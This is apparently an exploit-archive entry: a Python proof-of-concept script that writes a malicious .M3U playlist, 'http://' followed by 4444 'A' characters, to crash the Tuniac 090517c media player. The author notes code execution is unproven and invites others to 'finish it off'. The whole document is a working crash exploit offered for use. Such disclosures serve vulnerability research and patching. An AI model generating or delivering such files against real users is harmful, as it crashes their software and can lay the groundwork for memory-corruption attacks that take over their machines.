Tuniac version 09517c crash proof of concept exploit that creates a malicious .m3u file.
af4621d26c4721e5c5db2fc4b415b95f484e96679b5239312de543fdc443e455
#!/usr/bin/env python
##############################################################################################
#
# Tuniac v.090517c (.M3U) Crash PoC
# Found By: Dr_IDE
# http://sourceforge.net/projects/tuniac/files/tuniac/090517/Tuniac_Setup_090517c.exe/download
# Notes: Not sure if code execution is possible though. Maybe someone else can finish it off.
#
##############################################################################################
# Play around here, anything seems to knock it out.
buffer = ("http://" + "\x41" * (4444));
f = open('Dr_IDE.M3U','w');
f.write(buffer);
f.close();